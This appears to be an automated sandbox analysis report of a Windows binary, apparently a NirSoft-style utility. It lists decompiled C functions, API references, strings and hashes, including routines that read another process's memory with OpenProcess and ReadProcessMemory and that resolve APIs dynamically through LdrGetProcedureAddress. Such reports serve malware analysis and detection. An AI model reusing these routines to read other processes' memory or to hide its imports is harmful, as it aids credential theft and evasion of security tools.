                                                                                                                                                                  0x00409fb5
                                                                                                                                                                  0x00409fb6
                                                                                                                                                                  0x0040a043
                                                                                                                                                                  0x0040a04a
                                                                                                                                                                  0x0040a058
                                                                                                                                                                  0x0040a05f
                                                                                                                                                                  0x0040a06d
                                                                                                                                                                  0x0040a074
                                                                                                                                                                  0x0040a08e
                                                                                                                                                                  0x0040a099
                                                                                                                                                                  0x0040a0ab
                                                                                                                                                                  0x0040a0c9
                                                                                                                                                                  0x0040a0ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a0ce
                                                                                                                                                                  0x00409fc3
                                                                                                                                                                  0x00409fca
                                                                                                                                                                  0x00409fd8
                                                                                                                                                                  0x00409fdf
                                                                                                                                                                  0x00409ff9
                                                                                                                                                                  0x0040a006
                                                                                                                                                                  0x0040a018
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                  • String ID: %%0.%df
                                                                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                                  0x00406216
                                                                                                                                                                  0x0040621b
                                                                                                                                                                  0x00406222
                                                                                                                                                                  0x0040625f
                                                                                                                                                                  0x00406263
                                                                                                                                                                  0x00406269
                                                                                                                                                                  0x00406271
                                                                                                                                                                  0x00406273
                                                                                                                                                                  0x00406289
                                                                                                                                                                  0x00406289
                                                                                                                                                                  0x0040628e
                                                                                                                                                                  0x0040628f
                                                                                                                                                                  0x004062a9
                                                                                                                                                                  0x004062ab
                                                                                                                                                                  0x004062ad
                                                                                                                                                                  0x004062b0
                                                                                                                                                                  0x004062c3
                                                                                                                                                                  0x004062c3
                                                                                                                                                                  0x004062d3
                                                                                                                                                                  0x004062da
                                                                                                                                                                  0x004062f1
                                                                                                                                                                  0x004062f7
                                                                                                                                                                  0x004062fe
                                                                                                                                                                  0x0040630d
                                                                                                                                                                  0x00406312
                                                                                                                                                                  0x0040631e
                                                                                                                                                                  0x00406327
                                                                                                                                                                  0x00406275
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406285
                                                                                                                                                                  0x00406287
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406277
                                                                                                                                                                  0x0040627a
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406280
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040627a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406273
                                                                                                                                                                  0x00406224
                                                                                                                                                                  0x00406224
                                                                                                                                                                  0x00406229
                                                                                                                                                                  0x0040622a
                                                                                                                                                                  0x0040622f
                                                                                                                                                                  0x00406236
                                                                                                                                                                  0x0040623c
                                                                                                                                                                  0x00406243
                                                                                                                                                                  0x00406245
                                                                                                                                                                  0x00406247
                                                                                                                                                                  0x00406248
                                                                                                                                                                  0x0040624b
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x0040632d
                                                                                                                                                                  0x00406334

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32(?), ref: 00406074
                                                                                                                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                  • memset.MSVCRT ref: 004062DA
                                                                                                                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                                                                  0x004081e4
                                                                                                                                                                  0x004081ec
                                                                                                                                                                  0x004081fc
                                                                                                                                                                  0x00408200
                                                                                                                                                                  0x00408215
                                                                                                                                                                  0x0040821c
                                                                                                                                                                  0x0040822a
                                                                                                                                                                  0x00408231
                                                                                                                                                                  0x0040823f
                                                                                                                                                                  0x00408246
                                                                                                                                                                  0x0040824b
                                                                                                                                                                  0x0040824e
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x0040825c
                                                                                                                                                                  0x00408261
                                                                                                                                                                  0x0040826c
                                                                                                                                                                  0x0040826d
                                                                                                                                                                  0x0040826e
                                                                                                                                                                  0x00408273
                                                                                                                                                                  0x00408273
                                                                                                                                                                  0x00408276
                                                                                                                                                                  0x0040827c
                                                                                                                                                                  0x0040828a
                                                                                                                                                                  0x00408290
                                                                                                                                                                  0x004082ab
                                                                                                                                                                  0x004082c5
                                                                                                                                                                  0x004082c6
                                                                                                                                                                  0x004082d1
                                                                                                                                                                  0x004082d2
                                                                                                                                                                  0x004082d3
                                                                                                                                                                  0x004082e7
                                                                                                                                                                  0x004082ec
                                                                                                                                                                  0x004082f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082f5
                                                                                                                                                                  0x004082fe

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                  0x0040920a
                                                                                                                                                                  0x00409218
                                                                                                                                                                  0x00409223
                                                                                                                                                                  0x0040922c
                                                                                                                                                                  0x0040924b
                                                                                                                                                                  0x00409253
                                                                                                                                                                  0x0040929b
                                                                                                                                                                  0x004092e4
                                                                                                                                                                  0x0040929d
                                                                                                                                                                  0x004092a3
                                                                                                                                                                  0x004092b1
                                                                                                                                                                  0x004092bd
                                                                                                                                                                  0x004092cc
                                                                                                                                                                  0x004092d1
                                                                                                                                                                  0x004092d8
                                                                                                                                                                  0x004092dd
                                                                                                                                                                  0x00409255
                                                                                                                                                                  0x0040925b
                                                                                                                                                                  0x00409269
                                                                                                                                                                  0x00409275
                                                                                                                                                                  0x00409282
                                                                                                                                                                  0x0040928d
                                                                                                                                                                  0x00409292
                                                                                                                                                                  0x004092ec
                                                                                                                                                                  0x004092ef
                                                                                                                                                                  0x004092ef
                                                                                                                                                                  0x00409231
                                                                                                                                                                  0x00409232
                                                                                                                                                                  0x00409233
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409239
                                                                                                                                                                  0x0040921a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                  • memset.MSVCRT ref: 00409269
                                                                                                                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                  • memset.MSVCRT ref: 004092B1
                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,00000000), ref: 004092CC
                                                                                                                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                                                                  0x00409c73
                                                                                                                                                                  0x00409c7c
                                                                                                                                                                  0x00409c90
                                                                                                                                                                  0x00409c9f
                                                                                                                                                                  0x00409ca2
                                                                                                                                                                  0x00409ca7
                                                                                                                                                                  0x00409ca9
                                                                                                                                                                  0x00409cb1
                                                                                                                                                                  0x00409cc0
                                                                                                                                                                  0x00409cc2
                                                                                                                                                                  0x00409cc7
                                                                                                                                                                  0x00409ccf
                                                                                                                                                                  0x00409cd0
                                                                                                                                                                  0x00409cd7
                                                                                                                                                                  0x00409cd8
                                                                                                                                                                  0x00409cd9
                                                                                                                                                                  0x00409cda
                                                                                                                                                                  0x00409cdc
                                                                                                                                                                  0x00409ce0
                                                                                                                                                                  0x00409ce1
                                                                                                                                                                  0x00409ce9
                                                                                                                                                                  0x00409cf1
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409d08
                                                                                                                                                                  0x00409d08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d0d
                                                                                                                                                                  0x00409d0f

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CA2
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CC0
                                                                                                                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                  • API String ID: 1027343248-2054640941
                                                                                                                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                                                                  0x00401ac9
                                                                                                                                                                  0x00401ad1
                                                                                                                                                                  0x00401ae1
                                                                                                                                                                  0x00401ae7
                                                                                                                                                                  0x00401ae9
                                                                                                                                                                  0x00401aec
                                                                                                                                                                  0x00401c1b
                                                                                                                                                                  0x00401af2
                                                                                                                                                                  0x00401af2
                                                                                                                                                                  0x00401af8
                                                                                                                                                                  0x00401b0c
                                                                                                                                                                  0x00401b1a
                                                                                                                                                                  0x00401bfd
                                                                                                                                                                  0x00401b20
                                                                                                                                                                  0x00401b26
                                                                                                                                                                  0x00401b2b
                                                                                                                                                                  0x00401b36
                                                                                                                                                                  0x00401b40
                                                                                                                                                                  0x00401b43
                                                                                                                                                                  0x00401b4a
                                                                                                                                                                  0x00401b54
                                                                                                                                                                  0x00401b55
                                                                                                                                                                  0x00401b56
                                                                                                                                                                  0x00401b57
                                                                                                                                                                  0x00401b58
                                                                                                                                                                  0x00401b63
                                                                                                                                                                  0x00401b68
                                                                                                                                                                  0x00401b69
                                                                                                                                                                  0x00401b77
                                                                                                                                                                  0x00401b7d
                                                                                                                                                                  0x00401b82
                                                                                                                                                                  0x00401b82
                                                                                                                                                                  0x00401b88
                                                                                                                                                                  0x00401b8b
                                                                                                                                                                  0x00401b8e
                                                                                                                                                                  0x00401b91
                                                                                                                                                                  0x00401b98
                                                                                                                                                                  0x00401b9b
                                                                                                                                                                  0x00401ba0
                                                                                                                                                                  0x00401ba5
                                                                                                                                                                  0x00401baa
                                                                                                                                                                  0x00401bac
                                                                                                                                                                  0x00401bac
                                                                                                                                                                  0x00401bb2
                                                                                                                                                                  0x00401bb2
                                                                                                                                                                  0x00401bbe
                                                                                                                                                                  0x00401bc4
                                                                                                                                                                  0x00401bc6
                                                                                                                                                                  0x00401bc8
                                                                                                                                                                  0x00401bc8
                                                                                                                                                                  0x00401bd7
                                                                                                                                                                  0x00401bee
                                                                                                                                                                  0x00401bf0
                                                                                                                                                                  0x00401bf0
                                                                                                                                                                  0x00401c0e
                                                                                                                                                                  0x00401c0e
                                                                                                                                                                  0x00401c23

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                  • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                  • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
